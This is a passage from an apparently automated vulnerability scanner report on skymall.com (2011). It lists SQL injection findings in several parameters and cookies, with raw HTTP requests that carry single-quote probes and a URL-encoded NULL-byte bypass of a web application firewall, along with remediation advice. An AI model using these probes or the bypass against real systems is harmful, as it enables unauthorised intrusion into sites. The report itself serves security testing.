...[SNIP]...

Request 2

GET /adj/wn.nat.kwtv/weather;sz=300x75;wnsz=44;tile=1;wncc=Weather;wnpt=C;wnpc=weather;wncp=KWTV;wncid=198140;wnad85=kwtv;wnad44=worldnow;wndomain=about%3Ablank;kw=E05511_10004;kw=E05511_50085;apptype=platform;env=production;ord=37923550? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net
Cookie: id=ce2707d360000b2||t=1303486124|et=730|cs=oc-umh3y%2527%2527

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Fri, 22 Apr 2011 16:06:46 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Fri, 22 Apr 2011 15:51:46 GMT
Expires: Fri, 22 Apr 2011 15:51:46 GMT
Cache-Control: private
Content-Length: 4614

document.write(' \n<!-- Styles -->\n<style type=\"text/css\"> \ntable.main {\n \n    background: url(\'http://images.worldnow.com/Revenue/images/235259_G.jpg\');\n    \n    border-width: 1px;\n    border-spacing:
...[SNIP]...

1.3. http://www.skymall.com/shopping/cart.htm [hiddenlong parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.skymall.com
Path:   /shopping/cart.htm

Issue detail

The hiddenlong parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the hiddenlong parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

POST /shopping/cart.htm?pid=203459330&c=10500&fromSearch=true&fromVendor=false&sbs= HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/detail.htm?c=10500&v=&tab=pd&vendorDirect=false&pid=203459330
Cache-Control: max-age=0
Origin: http://www.skymall.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; overridepartner=ING; source=11E; partner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; brwshist_0=pid_203459330_; brwshist_1=pid_203458153_; PRODUCTCMPRODCAT=; PRODUCT203458153CMPRODCAT="10500: Promo"; maintab=tcontent1; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 90043274_clogin=l=1303494336&v=1&e=1303496232965; 90043274_clogin=l=1303494336&v=1&e=1303496234792; __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.4.10.1303494337
Content-Length: 122

lastCatalogPageViewed=&pid=203459330&Image2.x=154&Image2.y=9&hiddenlong=-1167300781738292668%00'&pid=203459330&sbs_cm_sp=&sbs=

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 517
Date: Fri, 22 Apr 2011 19:52:21 GMT
Connection: close

<html><header><title>Error</title></header><body><H2>Error</H2><table border="0" bgcolor="#FEEE7A" cellpadding="0" cellspacing="0"width="400"><tr><td><table border="0" cellpadding="3" cellspacing="1">
...[SNIP]...

Request 2

POST /shopping/cart.htm?pid=203459330&c=10500&fromSearch=true&fromVendor=false&sbs= HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/detail.htm?c=10500&v=&tab=pd&vendorDirect=false&pid=203459330
Cache-Control: max-age=0
Origin: http://www.skymall.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; overridepartner=ING; source=11E; partner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; brwshist_0=pid_203459330_; brwshist_1=pid_203458153_; PRODUCTCMPRODCAT=; PRODUCT203458153CMPRODCAT="10500: Promo"; maintab=tcontent1; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 90043274_clogin=l=1303494336&v=1&e=1303496232965; 90043274_clogin=l=1303494336&v=1&e=1303496234792; __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.4.10.1303494337
Content-Length: 122

lastCatalogPageViewed=&pid=203459330&Image2.x=154&Image2.y=9&hiddenlong=-1167300781738292668%00''&pid=203459330&sbs_cm_sp=&sbs=

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
P3P: policyref=/w3c/p3p.xml
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 19:52:22 GMT
Connection: close
Set-Cookie: JSESSIONID=19B956766103588EFB68597AFA02EB9B.menthuv5web1; Path=/shopping
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 19:52:21 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 19:52:21 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 19:52:22 GMT
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 19:52:22 GMT
Set-Cookie: TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303501941437~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; Expires=Fri, 06-May-2011 19:52:22 GMT
Set-Cookie: ol0=pid_203459330_qty_1; Expires=Fri, 06-May-2011 19:52:22 GMT
Set-Cookie: brwshist_0=pid_203458153_; Expires=Sun, 21-Apr-2013 19:52:22 GMT
Set-Cookie: brwshist_1=pid_203459330_; Expires=Sun, 21-Apr-2013 19:52:22 GMT
Set-Cookie: PRODUCTCMPRODCAT=; Expires=Fri, 06-May-2011 19:52:22 GMT
Set-Cookie: PRODUCT203458153CMPRODCAT="10500: Promo"; Expires=Fri, 06-May-2011 19:52:22 GMT
Content-Length: 148384


<!--includes code start-->


<!--includes code end-->
<!--header values start-->


<!--header values end-->

...[SNIP]...

1.4. http://www.skymall.com/shopping/cart.htm [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.skymall.com
Path:   /shopping/cart.htm

Issue detail

The pid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the pid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

POST /shopping/cart.htm?pid=203459330&c=10500&fromSearch=true&fromVendor=false&sbs= HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/detail.htm?c=10500&v=&tab=pd&vendorDirect=false&pid=203459330
Cache-Control: max-age=0
Origin: http://www.skymall.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; overridepartner=ING; source=11E; partner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; brwshist_0=pid_203459330_; brwshist_1=pid_203458153_; PRODUCTCMPRODCAT=; PRODUCT203458153CMPRODCAT="10500: Promo"; maintab=tcontent1; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 90043274_clogin=l=1303494336&v=1&e=1303496232965; 90043274_clogin=l=1303494336&v=1&e=1303496234792; __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.4.10.1303494337
Content-Length: 122

lastCatalogPageViewed=&pid=203459330%00'&Image2.x=154&Image2.y=9&hiddenlong=-1167300781738292668&pid=203459330&sbs_cm_sp=&sbs=

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 517
Date: Fri, 22 Apr 2011 19:20:43 GMT
Connection: close

<html><header><title>Error</title></header><body><H2>Error</H2><table border="0" bgcolor="#FEEE7A" cellpadding="0" cellspacing="0"width="400"><tr><td><table border="0" cellpadding="3" cellspacing="1">
...[SNIP]...

Request 2

POST /shopping/cart.htm?pid=203459330&c=10500&fromSearch=true&fromVendor=false&sbs= HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/detail.htm?c=10500&v=&tab=pd&vendorDirect=false&pid=203459330
Cache-Control: max-age=0
Origin: http://www.skymall.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; overridepartner=ING; source=11E; partner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; brwshist_0=pid_203459330_; brwshist_1=pid_203458153_; PRODUCTCMPRODCAT=; PRODUCT203458153CMPRODCAT="10500: Promo"; maintab=tcontent1; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 90043274_clogin=l=1303494336&v=1&e=1303496232965; 90043274_clogin=l=1303494336&v=1&e=1303496234792; __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.4.10.1303494337
Content-Length: 122

lastCatalogPageViewed=&pid=203459330%00''&Image2.x=154&Image2.y=9&hiddenlong=-1167300781738292668&pid=203459330&sbs_cm_sp=&sbs=

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
P3P: policyref=/w3c/p3p.xml
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 19:20:45 GMT
Connection: close
Set-Cookie: JSESSIONID=358774B5A848AA808F590D4F5481AD01.menthuv5web1; Path=/shopping
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 19:20:43 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 19:20:43 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 19:20:45 GMT
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 19:20:45 GMT
Set-Cookie: TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303500043274~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; Expires=Fri, 06-May-2011 19:20:45 GMT
Set-Cookie: ol0=pid_203459330_qty_1; Expires=Fri, 06-May-2011 19:20:45 GMT
Set-Cookie: brwshist_0=pid_203458153_; Expires=Sun, 21-Apr-2013 19:20:45 GMT
Set-Cookie: brwshist_1=pid_203459330_; Expires=Sun, 21-Apr-2013 19:20:45 GMT
Set-Cookie: PRODUCTCMPRODCAT=; Expires=Fri, 06-May-2011 19:20:45 GMT
Set-Cookie: PRODUCT203458153CMPRODCAT="10500: Promo"; Expires=Fri, 06-May-2011 19:20:45 GMT
Content-Length: 148384


<!--includes code start-->


<!--includes code end-->
<!--header values start-->


<!--header values end-->

...[SNIP]...

1.5. http://www.skymall.com/shopping/cart.htm [sbs parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.skymall.com
Path:   /shopping/cart.htm

Issue detail

The sbs parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the sbs parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

POST /shopping/cart.htm?pid=203459330&c=10500&fromSearch=true&fromVendor=false&sbs=' HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/detail.htm?c=10500&v=&tab=pd&vendorDirect=false&pid=203459330
Cache-Control: max-age=0
Origin: http://www.skymall.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; overridepartner=ING; source=11E; partner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; brwshist_0=pid_203459330_; brwshist_1=pid_203458153_; PRODUCTCMPRODCAT=; PRODUCT203458153CMPRODCAT="10500: Promo"; maintab=tcontent1; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 90043274_clogin=l=1303494336&v=1&e=1303496232965; 90043274_clogin=l=1303494336&v=1&e=1303496234792; __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.4.10.1303494337
Content-Length: 122

lastCatalogPageViewed=&pid=203459330&Image2.x=154&Image2.y=9&hiddenlong=-1167300781738292668&pid=203459330&sbs_cm_sp=&sbs=

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 517
Date: Fri, 22 Apr 2011 19:12:02 GMT
Connection: close

<html><header><title>Error</title></header><body><H2>Error</H2><table border="0" bgcolor="#FEEE7A" cellpadding="0" cellspacing="0"width="400"><tr><td><table border="0" cellpadding="3" cellspacing="1">
...[SNIP]...

Request 2

POST /shopping/cart.htm?pid=203459330&c=10500&fromSearch=true&fromVendor=false&sbs='' HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/detail.htm?c=10500&v=&tab=pd&vendorDirect=false&pid=203459330
Cache-Control: max-age=0
Origin: http://www.skymall.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; overridepartner=ING; source=11E; partner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; brwshist_0=pid_203459330_; brwshist_1=pid_203458153_; PRODUCTCMPRODCAT=; PRODUCT203458153CMPRODCAT="10500: Promo"; maintab=tcontent1; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); 90043274_clogin=l=1303494336&v=1&e=1303496232965; 90043274_clogin=l=1303494336&v=1&e=1303496234792; __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.4.10.1303494337
Content-Length: 122

lastCatalogPageViewed=&pid=203459330&Image2.x=154&Image2.y=9&hiddenlong=-1167300781738292668&pid=203459330&sbs_cm_sp=&sbs=

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
P3P: policyref=/w3c/p3p.xml
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 19:12:02 GMT
Connection: close
Set-Cookie: JSESSIONID=76AA45F5149BFA2FFC1715B0F9F4C7B1.menthuv5web1; Path=/shopping
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 19:12:02 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 19:12:02 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 19:12:02 GMT
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 19:12:02 GMT
Set-Cookie: TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303499522593~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; Expires=Fri, 06-May-2011 19:12:02 GMT
Set-Cookie: ol0=pid_203459330_qty_1; Expires=Fri, 06-May-2011 19:12:02 GMT
Set-Cookie: brwshist_0=pid_203458153_; Expires=Sun, 21-Apr-2013 19:12:02 GMT
Set-Cookie: brwshist_1=pid_203459330_; Expires=Sun, 21-Apr-2013 19:12:02 GMT
Set-Cookie: PRODUCTCMPRODCAT=; Expires=Fri, 06-May-2011 19:12:02 GMT
Set-Cookie: PRODUCT203458153CMPRODCAT="10500: Promo"; Expires=Fri, 06-May-2011 19:12:02 GMT
Content-Length: 148385


<!--includes code start-->


<!--includes code end-->
<!--header values start-->


<!--header values end-->

...[SNIP]...

1.6. http://www.skymall.com/shopping/dept.htm [CoreID6 cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.skymall.com
Path:   /shopping/dept.htm

Issue detail

The CoreID6 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CoreID6 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /shopping/dept.htm?c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/homepage.htm?pnr=ING
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; source=11E; partner=ING; overridepartner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274'; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.1.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496152509; cmRS=&t1=1303494334415&t2=1303494339099&t3=1303494352480&lti=1303494352480&ln=Outdoor%20Living&hr=/shopping/dept.htm%3Fc%3D10500%26cm_re%3DFeaturedCategory-_-Three-_-B%26cm_sp%3DFeaturedCategory-_-Homepage-_-OutdoorLiving&fti=&fn=search%3A0%3Bjoinemail%3A1%3B&ac=&fd=&uer=&fu=&pi=SkyMall%20Homepage&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 517
Date: Fri, 22 Apr 2011 18:40:35 GMT
Connection: close

<html><header><title>Error</title></header><body><H2>Error</H2><table border="0" bgcolor="#FEEE7A" cellpadding="0" cellspacing="0"width="400"><tr><td><table border="0" cellpadding="3" cellspacing="1">
...[SNIP]...

Request 2

GET /shopping/dept.htm?c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/homepage.htm?pnr=ING
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; source=11E; partner=ING; overridepartner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274''; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.1.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496152509; cmRS=&t1=1303494334415&t2=1303494339099&t3=1303494352480&lti=1303494352480&ln=Outdoor%20Living&hr=/shopping/dept.htm%3Fc%3D10500%26cm_re%3DFeaturedCategory-_-Three-_-B%26cm_sp%3DFeaturedCategory-_-Homepage-_-OutdoorLiving&fti=&fn=search%3A0%3Bjoinemail%3A1%3B&ac=&fd=&uer=&fu=&pi=SkyMall%20Homepage&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/1.0.0a mod_jk/1.2.30
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
P3P: policyref=/w3c/p3p.xml
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Fri, 22 Apr 2011 18:40:35 GMT
Connection: close
Set-Cookie: JSESSIONID=44C84BD324C2F7E5B3C5A3F1F5F632D4.menthuv5web1; Path=/shopping
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:40:35 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:40:35 GMT
Set-Cookie: source=11E; Expires=Sat, 21-Apr-2012 18:40:35 GMT
Set-Cookie: partner=ING; Expires=Sat, 21-Apr-2012 18:40:35 GMT
Set-Cookie: TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303497635469~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^; Expires=Fri, 06-May-2011 18:40:35 GMT
Content-Length: 174567


<!--includes code start-->


<!--includes code end-->
<!--header values start-->


<!--header values end-->
...[SNIP]...

1.7. http://www.skymall.com/shopping/dept.htm [TXNSESSION cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.skymall.com
Path:   /shopping/dept.htm

Issue detail

The TXNSESSION cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the TXNSESSION cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /shopping/dept.htm?c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/homepage.htm?pnr=ING
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=742D057A43F797E9E8131B7D50AC79FD.menthuv5web1; PSESSIONID=0a0ef7ad-e10f-484e-8ac0-9d2a7f576a45; source=11E; partner=ING; overridepartner=ING; TXNSESSION=[Session]~^163~^4424~^-=~^T~^1303494336343~^null~^ING~^-=~^10000~^F~^F~^F~^11E~^-=~^'; cmTPSet=Y; CoreID6=01617077583213034943369&ci=90043274; __utmz=258950152.1303494337.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=258950152.1552621464.1303494337.1303494337.1303494337.1; __utmc=258950152; __utmb=258950152.1.10.1303494337; 90043274_clogin=l=1303494336&v=1&e=1303496152509; cmRS=&t1=1303494334415&t2=1303494339099&t3=1303494352480&lti=1303494352480&ln=Outdoor%20Living&hr=/shopping/dept.htm%3Fc%3D10500%26cm_re%3DFeaturedCategory-_-Three-_-B%26cm_sp%3DFeaturedCategory-_-Homepage-_-OutdoorLiving&fti=&fn=search%3A0%3Bjoinemail%3A1%3B&ac=&fd=&uer=&fu=&pi=SkyMall%20Homepage&ho=data.coremetrics.com/cm%3F&ci=90043274&cjen=1

Response 1

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 517
Date: Fri, 22 Apr 2011 18:40:20 GMT
Connection: close

<html><header><title>Error</title></header><body><H2>Error</H2><table border="0" bgcolor="#FEEE7A" cellpadding="0" cellspacing="0"width="400"><tr><td><table border="0" cellpadding="3" cellspacing="1">
...[SNIP]...

Request 2

GET /shopping/dept.htm?c=10500 HTTP/1.1
Host: www.skymall.com
Proxy-Connection: keep-alive
Referer: http://www.skymall.com/shopping/homepage.htm?pnr=ING
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
